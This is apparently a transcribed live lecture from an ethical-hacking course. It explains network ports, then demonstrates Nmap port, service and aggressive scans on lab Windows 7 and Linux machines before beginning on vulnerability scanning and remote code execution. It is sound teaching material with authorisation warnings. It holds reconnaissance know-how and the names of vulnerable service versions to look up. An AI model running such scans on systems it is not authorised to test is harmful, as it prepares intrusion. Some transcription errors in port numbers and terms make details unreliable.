for my sessions, or you're requesting for data, and I'm giving out the data. In this case, since I'm giving out the data, I become a server, isn't it? And since you are requesting for the data, you become a client. The same thing happens in computer. The computer who is receiving the data would be client. The computer which is giving out the data would become server, isn't it? So now the server should be up and running 24/7, isn't it? Because for a client, there is only one server. But for a server, there are multiple clients. So let's say because of some error, if any of these 90 people may go off, they may terminate their system, or due to power off, if someone goes off, that does not affect the overall communication, isn't it? But what if there's some error in my side? Obviously, it will affect the entire session, isn't it? The same thing happens in computers. So server should be up and running for the 24/7. Because you cannot say that my clients will only connect to me on this particular amount of time, so I'll be only on for a particular while, and after that I'll go off. It does not happen that way. A server should be up and running 24/7, because you never know when a client will ask for information, because he should be ever ready that someone will ask me information and I should be ready to give out that information. As simple as that. Yeah, which means there will be a different set of ports which is used by a server. And again, the ports used by the server will be open all the time. because a communication can only happen if a port is open, isn't it? So what happens technically is client will send information to the server, will send a request to a server. Server will be waiting by opening a port, and will be keep on waiting until some client gives some request. After processing the request, he will still be waiting. So consider a server computer as like a shop. If you see the shop always opens, right? It will always be open from morning to evening. So whenever a customer comes in, you will ask for an item, and you will go back again. Even after a customer goes out, the shop will still be open. Why? Because he's expecting any other customer. The same thing happens here, because a server will always be waiting for incoming connection, and since he's always waiting for the incoming connection, the port on which his communication is established, that port will always be open. Until when? Until the server functions. Once the server stops, the entire port will be closed. So in other words, just relate this with a house and a door. In server, a particular port will be open and will be expecting some clients to connect and respond back with some service. So which means in computers, in your normal computer, there will be certain ports which will be open by default, and they will be expecting for some clients to connect and exchange the data. Clear? I'm just explaining you from scratch so that we can clearly understand what is the meaning and what is the understanding part of what server is. So in other words, it means in your computer, irrespective, since we have all 65,535 ports, not all ports will be open, but in every computer there will be few ports open by default, because it has to run certain activities, some services, right? So some ports will be open, and whatever port is open, it will be running some services. For example, let me take my computer. My computer is handling various activities currently, right? It is talking to Google, there is Gmail, Google Meet. It is handling various other operations. Since this is my another category of computer, it will be running various services. Since it is Windows, it will be continuously talking to Microsoft services. It will be talking to file shared services. My computer is sharing files with another computer. Hence, it will be sharing. There will be few ports open for the file sharing. There will be few ports open so that it can take the current time. In my system, there are few ports open so that it can continuously talk to Microsoft and so on. So for each task in a computer, for each network task, one port will be open, and it will be continuously performing these operations. Clear? Okay. So in another context, we can say that in your computer, by default, there will be various ports open. And these ports open, whatever these ports are open, that in behind that ports, there will be various services running. Okay, and the services means they will be waiting for some activity to go on. Clear? As simple as that. So there are different categories of ports and they differentiate with respect to numbers. Those are here. I'll not go much deeper into it. I just scratch the surface. So always understand in your computers there are 3 different categories of ports. As I said, in your house, there are 3 different categories of doors. Even though you have 65,535 different ports, but still you can differentiate the ports into 3 different category of ports. First category is called as well-known ports or reserved ports, which typically means that these ports have statically defined port number and service. Okay, so always understand every port will have to relate it with the service, isn't it? If a door is open, someone should be waiting for the communication to happen, isn't it? So the door is a port number, port 80, and the person who's waiting for the communication is HTTP service or web service. Similarly, port number 21 is a door, and FTP is a service which is waiting for the communication. Similarly, there will be a relativity of port number and service. So from IANA, it is defined that there will be 3 category of ports. First, well-known ports, where we have statically defined. That is, universally everyone agrees, whether it is Windows, Unix, Apple, Mac, or Samsung, or Apple, or Dell, or Lenovo, everybody agrees that if port 21 by default, it is communicating to FTP. Port 80, by default, it is talking to HTTP. Port 25, it is talking to SMTP. Port 22, it is talking to SSH. So it is universally accepted that these port numbers will be talking to these particular service. As simple as that. But what is the number of ports? This number is very less. So this port number is port number 1 to 1023. Obviously, 1023 is very much less for today's world of communication, right? So hence, what they did is, so the first category statically defines universally these services will be using these particular port number. So later, since there was more advancement in the overall services and ports, they have made a second category where you have vendor-specific ports. Previously, it was universally accepted, isn't it? Any service, specific service is talking to specific port. But here, the relation of the port number and the service is handled by your vendor. The vendor is nothing but your companies. So each vendor will be given a specific amount of ports, and they'll be using those specific amount of ports for their own proprietary services. A very best example, port number 3389. Port number 3389 is a port used by Microsoft for its remote desktop connection. So whenever you take remote desktop from your computer to one of your friend's computer, you're typically using port number 3389 over there. And it only comes up in Microsoft. It does not work in, it does not by default, it's not enabled by your Unix, right? So this is called vendor specific ports, where a specific company, a specific vendor will be using this particular port number for its proprietary services. Like Windows will be using it for RDP. MySQL will be using 3306 for MySQL. PostgreSQL, that is database, it is using 5432 for its own database. So the port number ranging from 1024 to 49,151 will be used for vendor specific ports. Now, what about the third category? The remaining port number, that is 49,152 to 65,535, are used as dynamic ports. Now, what is dynamic ports? If you remember, I defined that there will always be server and the client, right? Server should be using a static port number. Why? Because he will be up and running right from the morning to evening. So that his door should be statically defined so that people can easily identify him, right? So that is why these first two categories are used by server-related services. So they're all used for servers. Okay. So if your system is a FTP server, it will use a 421. If your system becomes, if you make your computer as a MySQL server, it will become a MySQL database server. It will open 3306. If you turn on a proxy server, it will use port 8080. So whenever these first two ports are always used in the server category. Okay. As an example, you can see again the net stack. Observe here, my all communication are going to all communication are going to Google, and it is going from my computer to Google's computer. On which port number? They're always going towards the first category, that is like a well-known or reserved port number. See, the receiver is always 443, which is HTTPS, 89 web service, 43, 443 another HTTPS service. These are all servers. But what is my port number? My port number is 59,608, 60,796, 60,924. Where? Because I am the client and this guy is a server. So hence, for whenever a client is making a request, obviously he also has to use some port, right? So dynamic ports are used by the client services to initiate the communication and to handle the communication, whereas the server ports are used for statically defining a particular port to a particular service. Clear? So now I hope it's pretty much clear about what ports is and why ports are used in systems and what does it mean when a particular port is open and how this overall thing goes on. I hope by now, I hope it was pretty much clear about until now. If you have any queries so far regarding any other topics that we have discussed so far, please let me know that, because the next we'll go directly into hacking. There, if you're not pretty much clear of any of the topics that we have discussed, it will be a bit confusing later. Please let me know if you have any queries. so we can go forward. Any queries, guys, regarding the ports or whatever we have learned so far? Any queries? Please mention the queries in the chat box, or you can mute yourself and you can raise the queries as well. Okay, I don't see any queries. Okay, great. It's pretty much clear for everyone. So let's go forward and let's see more about hacking. So far we understood about ports. We understood about what is a basic backbone for a communication to happen on a computer, isn't it? We understood how ports define, what the receiver define, and so on, the service and all. Now, at the end of the day, why do we want to use these ports? It's very simple. What did I say about ports? So ports define that how many doors are open on a computer and what is running in the back end of the computer. Because so when a port is open, that means there is some service running on it. Okay, so if some service running on it, obviously it is responding back to us. So there's some application or some services running, some network activities running, and that network activity will respond to us when we communicate to it. Right, that's what it means. So this is the generic way how network work. But for a hacker, if I come to know how many doors are open on your house, and if I come to know what is running behind that particular door, I can easily come to know what all the loopholes it has. I can come to know how it works. I can come to know what it is running in behind, so that it will help us in hacking your computer. So this port scanning is a process, a very basic, a very major process in every hacking, which clearly tells us how many ports are open in a computer, what services are sorry. So what services are running on a computer, what operating system is running on a computer, what are the information that is being leaked on a computer, and what are the different vulnerabilities that is existing on a computer. So through ports, any hack, any communication, any attack that we do, all things happen through port only. So port becomes like something like a very backbone of your hack. As I said, port is literally a door of a computer. So whenever something has to go inside a computer, it has to go through ports. If any information is coming out of a computer, it has to come through ports only. That is why it's pretty much necessary to understand ports and to also identify what ports are open and what is running behind. Okay, so the overall information gathering, our intention is to gather as much as information as possible. So we'll be always going behind the ports and we'll be collecting more and more information. Okay, so the next three categories that we'll be looking forward, in all the three categories, we'll be getting information from these ports. So sequentially, let us learn what will the specific category will teach us. The first, which is port scanning, will tell us what port scanning is a part where we can identify what ports are open and what services are running in the particular computer. That's what our intention is. So at the end of the day, we are trying to identify what ports are open, how many doors are open, and what is running in the backend. As simple as that. Second, in the enumeration process. So obviously, the first step is a predominant or it's a basic thing. Once you have, there's an initial element. So once you have enough ports open, you'll go for the second part. So obviously, the second step has a dependency of the first step, and for the third step, second step would be the dependency. So each step acts as a dependency for the upcoming step. Okay. So first, we'll use port scanning, where we'll try to identify what ports are open, what services are running. So once we identify how many ports are open and what services are running, then we will probe that particular port number, we'll probe that particular port and try to see if some information are being leaking from that particular port or not. So we'll try to fetch some more information from that particular port and see if that information can be used in the later classes or in the later attacks. Okay, and once you have the open port numbers and once you have enough information about your target, then we can assess our identified information and we can say if there are any known vulnerabilities in the victim computer or not, Once we come to know any vulnerability, that means you can utilize that vulnerability and start compromising that particular computer. As simple as that. So our ultimate aim is what? We want to gain control over our victim computer, isn't it? In order to gain control on a victim computer, we need to identify some loopholes on the victim computer. So to identify some loopholes on the victim computer, you have to first identify what are the different doors that I can hit and get information, and then what are the different ways, how can I use those collected information as a loophole so that I can gain control on the victim. As simple as that. Okay, so all those things that we discussed now were completely theory. I hope I really was understanding. It would have bored you a lot in the basic theoretical concepts, but always understand any attack that we go across, everything happens through tools, completely happens through tools, and whatever communication that we send or receive happens in a fraction of a second, right? We cannot go and easily see how packets, I mean, we cannot literally go in real time and see how packets were sent from one computer to another computer and how can you come back. We still can see it, but later, not in a real time. Okay, but so that's the reason we are understanding that in a simple and a straightforward on a very scratch level, so that we can make sense when a particular attack works. Okay, so hereafter completely it would be on practical part. So if you have missed anything, if you're not able to clarify things, so please let me know that in the chat box. I'll be answering your queries when a particular topic is discussed. Okay, so let us start with port scanning. Now, what is port scanning? Port scanning is a kind of is a process where we will try to capture what ports are open on the victim machine and what services are running on the victim machine, so that we can use those open ports and services for our enumeration and later for our vulnerability analysis. Okay, so I hope so far it was pretty much clear. So coming back to my mistake, let me connect to my lab network. So here I'm going to be using, so these are all the basic information. Now what I'm going to be using is I'm going to be using my lab network. If you recall, at the starting of our session, I also said that we'll be using the penetration testing. We'll be trying to hack two computers on a network, isn't it? So here we'll be discussing that how do you use these steps. So how do you perform those port scan? We'll perform the port scanning. We'll be performing enumeration. We'll be performing our vulnerability scanning, and later whatever vulnerability that we identified, we will use those vulnerability that we identified, and we will try to gain access on the victim machine. Pretty simple and straightforward. Okay, so in our case now we need to perform port scanning, enumeration, and vulnerability scanning on our victim computer, and whatever information that we have gathered will capture over here, just for our our reporting purpose. So what I'll do is I'll do the same. First, let me do the port scanning and see what all information I can get, and I'll note it on here. Later, I'll do enumeration. Whatever information I get, I'll report it over here. I'll do vulnerability scanning. Whatever information I get, I'll report it that here over here. Okay, pretty straight and simple. Okay, let me first check if I have a connectivity with my lab machines. Okay, the machine is responding back. This is my Kali Linux, and this is my Windows 7 computer. I think this machine should have some issue. Let me quickly verify my network. Okay, that's great. Let me check. It did not have connectivity. Just give me a sec. Let me disconnect and reconnect back. Okay, should be having connectivity now. Let me test it, and in a while it should be up and running. Perfect. Okay, that's upward. It should be running now, I think. Let's see why it is running. Sec. Put that one. Yeah, now it's running. Perfect. Okay, so I have all the three computers in my same network, and they are interconnectable. They can talk to each other. So here, coming to the tools I'm going to be using. For port scanning, the very major tool that is used across the world from the acting domain is called Nmap. So Nmap is a tool, a very widely used tool for doing a port scanning. Let me use that particular tool. Okay, so let us just start with Nmap, and as I said, so I'll be using putty because anyhow I have to use my Linux as attacker machine throughout my overall session. I'll always be using Linux as my attacker machine, and those two Windows and Linux machine as my victim computer. So just because I cannot share my screen on Kali Linux, I'm using my putty, that is through my like putty SSH connection. I'm connecting to my Kali Linux machine, and later I'm exploiting all those activity through my Kali Linux machine itself. Yeah. And again, at any point of time, if you have any queries, please write your queries in the chat box. That's great. So let's start. So Nmap, coming to port scanning. So port scanning is handled by a tool called Nmap, and this tool is a CLI based tool for all the commands that I'll be trying in today's session. We can go get the complete list of those commands from this link. Let me give you the link, guys. No, okay, this one. You can go to the link. So you can get the complete link over here, where you can get the cheat sheet for all the Nmap commands. Okay, with explanation as well. Yeah, so let's go forward and start hacking. Okay, so as I said, the reason why we need to do Nmap or port scanning is we are trying to gather information regarding a target. What information are we trying to gather? We're trying to gather what ports are open on the victim machine, what services are running on those victim machine, and what operating system that is running on the victim machine. These are the three things that we actually require. We can literally do on port scanning. So, but you can also probe the ports and to get information leakage, and you can also probe the ports and you can try to get vulnerabilities as well. But this is handled by different tools. Okay, identifying information leakage through ports is identified through enumeration process, whereas identifying vulnerabilities through ports is handled by vulnerability scanner. As simple as that. Yeah. So hope so far it was pretty much clear. At any point of time, any queries, guys, please let me know the queries in the chat console. Let us start one by one. Okay. So here, as I said, we have two computers, 120 and 134. Let me do port scanning and on 120, and later we'll see how to do port scanning on our Unix-based machine. So I'll not run any commands, any switches. I'm just going to use Nmap space the target IP. Okay. So Nmap is a port scanner. Its job is to identify what ports and services are running. Okay. So Nmap, or any information gathering that we are doing, is called as active information gathering, which means these information are gathered by probing the ports on the victim machine, which means the packet from my computer will go to a Windows computer, that is 120, and it will capture the information, which means my activity is completely logged and recorded on the victim machine. So what happens in real world, if you try to do port scanning on any of the website or any of the computer which you do not own, in that case your activity will be logged on the victim computer or the target computer. If that computer has a logging service, obviously you'll have a complete right to lodge a complaint on your IP address or your activity, and obviously it will be a serious offense. So it's not recommended to do any of your active information gathering, that is almost any attack in the overall case, in the overall process. Never do any of these attacks on the computer which you do not own. Only do these attacks on the computer that you own. Okay, because if you do not own the computer on which you're doing the attack, then obviously they can lodge a complaint on you. So the reason it's always recommended to practice your hacking skills on your lab environment or on the computer which you exactly own. That is your own computer or your personal PC, or use VirtualBox and try and set up a lab, and through that you can do all the hacking. Yeah. So now let's get back to our output. If you see, very simple command, just nmap space IP address. Okay. If a target is domain name, you can provide domain name. Here I have given IP address, as simple as that. So what does the response comes up? So response starts from here. Actually, technically speaking, it starts from here and ends over here. It firstly says what is the system name, what is the IP address, what time the scan started, when it's completed, all those expensive stuff. It starts from here and it says, if you observed here, it says not shown 992 filtered ports, which means it is not displaying the status of 992 ports. But how many ports status has been displayed over here? They're only displaying 8 ports. Okay. Why are they not displaying any ports here? Okay. So they're actually, by default, any port scanner in the world will not scan 65,500 ports in default scan. Why? Because when you try to scan 65,535 ports, it will generate a lot of traffic first. And second thing, by default, any computer will not be enabled on all 65,535 ports. So it's not necessary. And second thing, even if you try to do it, there'll be a huge traffic sent and it will take a lot of time to do the scan. Hence, by default, every port scanner will scan the common ports, okay, commonly used ports. Yeah, so people try to scan commonly used ports. So what Nmap by default does is in its database or in its content, it has most commonly used 100 ports, and it will try to scan those ports. So out of those 1,000, my mistake, 1,000 common ports. Out of those 1,000 common ports in the target machine, there are 8 ports open. What are the ports? Ports are port number 135, 139, 445, 54, 2869, 3389, 5357, 10243. If you observe, these ports are well-known reserved ports, and these ports are vendor-specific ports. Why? How can you identify that? You can identify that with the help of the range. Clear? Again, guys, at any point of time, if you have any query, please mention the query in the chat box. Okay. So let's go forward and see. So here we have identified the port number, which clearly gives us, serves the first purpose, saying that we have successfully identified open ports, that is few of the port numbers. Okay, let me try to copy those things and paste it over here and open ports. These many ports are technically open on this particular computer. But if you observe the port, it says that port number, okay, and their respective services. Okay, some says MSRPC, NetBIOS, Microsoft DS, blah blah blah, those things. Okay, so always remember, when you do a default port scan, it will only tell you the port number accurately. It will not tell your services accurately. If you want to get the accurate service along with the port number, use the following command. That is nmap space hyphen lowercase s uppercase v space the IP address. So when you use the following command, nmap will take a bit more amount of time, and then it will try to fetch it will try to get more information, like giving you accurate port numbers and accurate services. Okay, it will clearly tell you the accurate services, as simple as that. Okay, so generally nmap will take a bit of time, so it will take a lot of time to do, because the overall process involves, like, it will send packets from the attacker computer to victim computer. Depending upon how the victim computer responds, it will judge what ports are open, what ports are closed, and give you some information. Okay, so meanwhile, if you have any queries, guys, please use the queries in the chat box. As discussed by Aparna ma'am, I'll be sharing you a few of the assignment questions. You can so obviously these commands and the queries, the commands and the output would be consisting in that particular thing. So obviously, if there are any queries in the earlier stage, please raise the queries in the chat box itself so that we can clarify that in the earlier stage itself. Clear? So this will take a bit of time. So let us give it a particular amount of some amount of time. And let me run the similar scan in one of my other instance on my Unix machine. If you remember, we're trying to perform hack on two victims. That is on our one on our Windows-based machine, other on our Unix-based machine, isn't it? So which means we need to gather information on both Windows and Unix as well. Let me try to do a scan on my Unix machine as well. So along with this thing, let me add another info. So -VVV basically stands for verbose. What this command does is obviously nmap consumes lots of time, isn't it? But we do not have any status of what is happening in the background, isn't it? So in order to prevent this like a gray shade during this process, we can use -VVV, that is enabling a verbose mode, which technically what it does is it will show you what is happening in the background. It is just showing you some information. Like as shown here, it will show what all the ports are open in this case, and it will also show you what is running in the background. Yeah. So all these commands are present in the cheat sheet link that I've shared. That is this one. You target -SV -O -SN -T4 -A, all stuff. So obviously I'll be covering only the scratches in the session. You can get more information, get more idea, and lot more commands over here. So whatever is required for the overall session, I'll be covering that. One more detailed information, we can go through this particular link, because obviously we are time bounded. We would be covering up the topics based on our requirement, isn't it? Yeah. So here we have got output. If you compare this with the previous output, previously we only got this part, isn't it? We only got how much? We only got these information, only this part of information, isn't it? But now we are getting the version as well. That is what this scan is used for. Okay, so smallest capital V means that it's a service version detection. It will accurately tell what ports are open and what services are running. So here in this case, port 135 is running, 139 is running, 445 is running, some Microsoft DS service, 135 is running RPC service, 139 is running NetBIOS service, 54 it was not able to identify, 2869 is running some HTTPD service, 5357, 10243 all are running some HTTP service, and 3389 is running a Microsoft WBT server. Basically, in a layman's term, it means it is running a RDP service. Okay, so it gives you some idea about what services are running, and that's it. Obviously, until you are much more familiar in the ports and services, this sometimes may not make you much not give you much clarity about what can I do with this much information. Obviously, right? It may look something like, hey, this is something like a faltu wala information, right? So it may sound like that way, but trust me, it's not that way, because we are using a wrong switch if you want to look every information in a single command. This is a step-by-step information. So instead, if you want to look all the information in a single command, you can do one scan called as aggressive scan by using this command. Obviously, we people of this generation have a bit less patience. So in that cases, we can use such a big command, such a command which can give you all the information in a single slot. That is information like what ports are open, what services are running, what operating system exactly is working, or Nmap can also do enumeration. Nmap by default, by using few of the commands, it will do enumeration, and that is handled by a command called -A. So -A stands for aggressive scan, and what it's going to do is it is going to do by default port scan, which is it is used to identify what ports are open, what ports are closed, what accurate services are running, what exact operating system that has been running, what operating system that has been running in the victim machine, because Nmap might not be able to give you accurate OS, because the concept of Nmap is basically works on guessing basis. So sometimes it may not give you accurate operating system. It can tell you that the operating system might be this or that or another operating system, but it may not be able to give you accurate operating system. Yeah. And along with that, -a command will also do enumeration, and it will try to fetch if there is any information leakage on the concerned port, and it will try to give you those information. Okay, so one -a command will do multiple jobs. So hence it will take a huge amount of time. So it will take at least, if there are enough amount of ports, it will take a huge amount of time. As you can see, it started at 1533 and we are currently at 1535 and we still have 25 seconds remaining. You can check the status by clicking the space on the screen. Okay, let me run the same type of command on my Unix based machine as well, just to save much time. 192.168.43.134, and let me add a verbose so I can get the status. So what I can do is, if you want to save your time, if you want to go process wise, you can try all the commands. And what I do recommend for every people is go through all the commands listed over here. I've mentioned target here as target. You can typically use the IP address. So you can use a domain name, IP address range, or IP address numbers, and try all the commands. So what I would recommend you guys is on your own lab setup, try to perform all the commands and see how differences you get, and compare scans to scans, in a pretty patience format, so that you can get more details about this. And trust me, this is one of the common thing that we typically do in a network-based penetration testing or in a generic penetration testing. Yeah, so this will take some more amount of time. So meanwhile, guys, if you have any queries, please punch in the queries in the chat box. Okay, and yes, we'll be utilizing the enumeration here itself. The nmap itself will do as enumeration, so no need to worry. It will do a certain level of enumeration here itself. So obviously that will cover our part here itself. So next, once we have enough information from here, we will directly dive into our vulnerability scanning and see what all loopholes our victim machine has. So this will contain us port scanning and enumeration part. Yeah. So we'll make a note of what all information that we have captured. So for the output, let me cover the output of this particular screen so that we can capture those. We can record those for our future attacks. So you have got a huge amount of information from our Unix machine. Let me start it. Let me copy it. So it has started from here. We copy all this information. Oh, it does contain a lot of status because of -vvv. You can observe that there's a huge amount of information that is leaking to us. Let us copy it to my reporting tool, and there let us validate it. Okay, so let us see what information contains. So let me clean it a bit so that we don't want to see the mess that is discussed, that is available over here. We put all those unwanted mess, clear out all those unwanted mess. Ouch, I think the command starts from here. So yes, the command somewhere ends up here. Okay, so this is where the actual output has started. So let us see what all information it is showing us. So first, because we have got the info, okay, we have also got information from Windows machine. That's great. Let's start this one as well. Okay. We have both information of both Windows machine and Unix machine. Let us see what this information mean. And because we have already covered both port scanning and enumeration in the nmap itself, so let us go forward and see what all information will be helpful for us. So what nmap is saying that is, it is saying us that the 135 is running RPC and 109 is running in BIOS, which we also got the same information even on service version scan. But the difference that we get over here is that by using -a scan on our Windows machine, we are clearly able to get the accurate operating system through operating system version on port number 445. So basically 445 port number is running SMB service. So it has a By enumerating the port SMB service, we can get the actual exact OS. So through that, Nmap is able to give us what the exact operating system is, and it is telling us that the victim computer is running Microsoft Windows, that is Windows 7 Ultimate. The build number is 7600. So if we just go to Google at all, in a simple case, in a very blunt case, even if you just go to Windows 7 build 7600 vulnerabilities, you'll get a huge list of vulnerabilities there itself. Okay, so this way, in the version itself, you can identify a lot of vulnerabilities. Clear? So this is one way how to identify vulnerabilities. If you observe here, that gives you similarly, it gives you various information, which version it is, which version this is, and so on. You scroll down here, it gives you few more information. This information is due to enumeration. Here it gives you which Windows version, what is the system name, what is the MAC address, what is build number, and what is the default user. All those information is pulled in. So the outcome of the enumeration scan on Nmap is we got the target operating system, the accurate operating system of target as Windows 7 build 7600. That's a major information that we've already got. Because the Windows machine is typically running nothing there. So let me show you. Let me take a remote desktop of this machine and show you. This Windows machine is literally running nothing. It is not even running a single task. So whatever screen I'm showing you, this is what the victim machine is. If you observe, there's nothing running it. Even if you go to Task Manager here and see, this is literally running nothing. Right? But still, I can do port scanning, I can do enumeration, and I can get a lot more information. Isn't it? That's the beauty of a port scanning. Clear? And the reason why I'm able to show you the screen is because I have the credentials. That's off the topic. That's the reason. Okay. But we will consider that as completely black box because we're not going to use anything from the UI. So, but we have got this many information from Windows machine. Let us see what are information that we have captured in Unix-based machine. Unix-based machine will give you a lot more information because it is dedicatedly operating system. It's an operating system that is dedicatedly created for practicing hacking. Here we have got the accurate versions of the software that is running. We have got which software is used to run FTP, which software is used to run SSH. There is various software running on it, like there's Telnet running on it, SMTP is running on it, domain services are running on it. HTTP, a web server is running on this. We are running HTTP version 2.2.8, and we know that it's running it's Ubuntu based machine. So we have got the accurate target operating system here. It's a Ubuntu based machine, and let's say if they are running NetBIOS, it's a Samba based operating system. We also got Samba. Samba is basically a service, something similar to SMB. It is running SMB version 3.0.20. You can also go to Google and just type Samba 3.0.20 A. I think it's A, right? No, A. Debian vulnerabilities, and you'll get a list of vulnerabilities that you can even get a very first step itself. You get all the list of vulnerabilities in that particular operating system. So this way you can identify various information in the port scanning itself. Yeah. If you scroll down, you'll get more information saying that what shell is running. It is also saying that it's running a metasploitable root shell. It's running another FTP service called ProFTPD version 1.3.1. It's running a MySQL 5.0.51a. And it is running a PostgreSQL database. It's running a VNC service. It's running an IRC service, running an XW1 service. It's running another Apache service. Okay. So all those information we can easily get with a very simple port scan. Okay. So it was not able to get your accurate operating system, but it is able to give you the Linux kernel version. That is, it is running Linux kernel 2.69 to 2.6.33. Okay, so these type of information is what we can gather in port scan. This is what is very much necessary for us. In the combination of port scan and your enumeration, we can get enormous amount of information from the target mission. Okay, but how do you use this information? That depends upon what type of attack you are trying to do. But always remember, you cannot just go and blindly attack a target by just completing your information gathering in a partial way. So in the overall 3 steps, you've only covered 2 steps. That is, you have done port scanning, you have done enumeration. That's it, nothing else. Yes, you are still yet to perform vulnerability scanning, isn't it? So we have so many information now regarding our target. Let us go to our vulnerability scanning, and we'll try to perform vulnerability scanning and see what all vulnerabilities do we have on the victim mission, so that once we find out vulnerabilities, we can try to exploit that vulnerability and gain access on the victim mission. Pretty simple and straightforward, isn't it? Clear? And guys, so this completes your port scanning. I hope it was very simple and straightforward because of time constraint. We only covered few of the commands of port scanning, like the basic scan, service version scan, and I directly dived into aggressive scan, that is -T4-A. So obviously because of time constraint. So I would recommend you guys to go through all the scans, and if you get any issues, you can get back to us. Obviously, if you get any results, obviously you can get back to us. Okay. So in our whole process, we'll go to vulnerability scanning. But before proceeding that, hope so far it's pretty much clear. If you have any queries regarding any topic that we've discussed so far, the port concept, and your port scanning concepts, I hope everything is pretty much clear. Any queries so far, guys, before proceeding towards vulnerability scanning? I don't see any queries so far. Is that completely clear? Or I'll be asking questions in the end. In that case, okay. Is that okay? Is it okay, Aparna ma'am, to ask questions?
Bharat, Aparna has just stepped out.
Okay.
So she will be back in some time.
Oh, okay. Sure, sir. Over. No problem there. Yes, any other port scanner? Yes, there are various different other port scanner called as Angry IP scanner and mass scanner. So apart from Nmap, Angry IP scanner and mass scan tool are both very much popular in cybersecurity. So we can use those things, but Nmap is the most efficient version, and it's one of the commonly used port scanner. I would say, if I say that Nmap is one among the top 10 hacking tools, so that's the right word of Nmap in that case. Okay, so these are the different port scanner in terms of port scanning. Okay. Any queries, guys, regarding port scanning or understanding ports? Yes, so far? Can Nmap open closed ports? No, Nmap is just a port scanner. It is used to identify whether a port is open or closed, but it cannot do any activity on behalf of you. Nmap, using some script engines, Nmap can also be used as a part of vulnerability scanner as well, using its Nmap script injection. So it's again a bit more a deeper concept. So just to give you a hint, Nmap NSE scripts are called as NSE scripts. Using that, we can do certain activities like brute force, password cracking, and furthermore information gathering that we can perform. But it cannot open any closed ports. Not only Nmap, any tool in the world cannot open any closed ports. If at all you want to open any closed ports, the only way is to compromise the victim mission, and from the mission internally you have to open the port. Always the port should be open internally. You cannot open a port from external perspective. Is that clear? I hope all is pretty much clear so far. Any other queries, guys? Regarding port scanning or ports? Okay, so that's clear, I hope. So let's go forward. Okay, let's go forward and let's see what is vulnerability scanning. Okay, so far we have enough amount of information regarding a target. So let's go forward and learn about vulnerabilities. Okay, so by default, from the definition, vulnerability means it's some loophole. So basically, vulnerability is nothing but a loophole that exists on a system or a protocol or any different entity, right? The process of vulnerability scanning is nothing but identifying vulnerabilities on the victim computer. So the process, vulnerability scanning is a process where you try to identify vulnerabilities on your victim computer. As simple as that, right? That's the overall process. So how that will be carried out? So again, vulnerability scanning will be doing the entire information gathering step right from the first step, which means your vulnerability scanner itself will do port scan. First, it will try to probe and identify how many ports are open in a system. Then it will try to identify what services they are running, what operating system they are running, and what information that decay that it is being doing. So it will try to identify these many information, and once it identifies these many information, it will assess the available information, and along with your vulnerability scanner, it's basically done by a tool. Along with these many activities, your vulnerability scanner will have its own database. Okay, in its own database, you'll be having a list of known vulnerabilities. If you recall, I was just going through the Google and I was identifying vulnerabilities in let's say I tried Samba 3.0.20 Debian, right? I did it manually by going to Google, right? So what your vulnerability scanner will do is, as soon as it fetches this information through enumeration, it will sort of cross verify in its own database, and it will check whether this version has any known vulnerability or not. So whenever it identifies that, okay, this version has this vulnerability, it will populate that vulnerability in our report. So basically, from a system activity, or so from a security analyst perspective, from a user perspective, his job is just open a vulnerability scanner, select the target, select the type of scan he's going to do it, schedule it, and sit back on his chair and relax for a while, and until your vulnerability scanner will do all the job and give you the report. It is that easy job. Now, even it sounds like that easy job, it might not be that easy job, because in corporate, if you recall, in yesterday's session while discussing about penetration testing, you may come across vulnerability assessment, isn't it? Right? So this is what they do in vulnerability assessment. They use these tools to scan your entire infrastructure, your entire network, or if you have a website, it will try to scan your website, and then it will give you a report. So you, as a security analyst or pen tester, you will take that report to your manager or a TL, whatever you are going to reporting him. So that person will assess this request, and he will see if he finds any malicious things over there, or some it may raise some false positives. It may say something is existing, but it may not existing. Those things can be happen. Obviously, tool is a tool. It can give some inaccurate results. So his job is to filter out those results, and then he will present that to the system administrators or developers who will be actually fixing those issues. Where when you are a vulnerability assessment person, or when you go to a job role, something like vulnerability assessment team, or if you go into vulnerability management team, or if you go into a security analyst team, or if you go to a penetration testing team. Okay, your job would be, so obviously this is a very decent job. There are people, this is basically a L2 job, where a lot of companies, I've seen a lot of companies who has around like 30 to 40 people in a single team. Their daily life 9 to 5 job is to identify vulnerabilities using a vulnerability scanner. Even in my organization, this is a part of our assessment. We technically do a detailed penetration testing. So in that process, this is also a part of our job to analyze what all loopholes or vulnerabilities that we identify on our target computers or target computer. Yeah. So obviously it's a pretty decent and one of the real-time job in the world. So whatever steps I'm going to be showing up in the tool, so kindly note down, or if you have any queries, please raise those queries, because this is the exact 9 to 5 job that we'll be doing in certain organization under a security analyst job or a vulnerability assessment team's security analyst job. Clear? So let's go forward. So as I said about that, it's a job of a vulnerability analyst, vulnerability scanner tool to do all the job. Now, what do we need to understand as a security analyst or as a pen tester? To understand what type of vulnerabilities that we exist. So obviously, I'm going to be giving you a few categories of vulnerability. It's not possible to say you only get these vulnerabilities, because obviously, to a statistics analyzed by Veracode, there are around like 4 billion websites across the world. And if you observe, just a few minutes ago, we discussed that there are around like 65,535 ports itself. But how can you even imagine that how there would be infinite number of vulnerabilities? Obviously, it would be completely foolishness or impossible to say that a vulnerability exists. I can count the number of vulnerabilities, or I can clearly tell you that you can only come across this vulnerability. It's not possible that way, because every day there are new vulnerabilities punching up, would be raising up in the world. Okay, so it's completely impossible to say that only these amount of vulnerabilities will be existing. Okay, so what we can do, what we actually do is, but even though I cannot say what exactly a vulnerability is, I can clearly tell you that any vulnerability that can be identified, it can come across a particular category. So every vulnerability or every loophole would be a similar kind of a loophole, or it could be a kind of a similar kind of a categories of loopholes. So the root cause of that particular loophole could always be a single type. Okay, so let us see those kind of categories which commonly exist in a kind of computers. Okay, so any vulnerabilities that we identified will always come under one or the other category of vulnerabilities here. Yeah. So first we come across a remote code execution vulnerability. Okay, so remote code execution vulnerability is a category of vulnerability where this vulnerability, yes, ma'am. You want to raise any queries? Okay, I think there was due to some mistake. Okay, let's go forward. So yes, let's go to remote code execution. So this category is a category of vulnerability where if this vulnerability exists, if this type of category or this category of vulnerability exists, this vulnerability allows a hacker to execute any code of his like on the victim machine. Let me take a real-time example. Let's assume that if your computer is vulnerable, or if there is a loophole of this remote code execution vulnerability, that means as a attacker, irrespective of whichever location I am currently located in, I can execute any code on your computer without your permission. This is what can be happen. This is what that we can do with the help of remote code execution vulnerability. Let me repeat. Remote code execution vulnerability is a vulnerability which allows a hacker to execute any code on the victim computer without any authentication or authorization. So usually this code is considered as a criticalist code, or it's a highest critical level code. If this code exists, that means your computer is gone. Your computer is completely under control of a hacker. But what this code means? So again, literally, 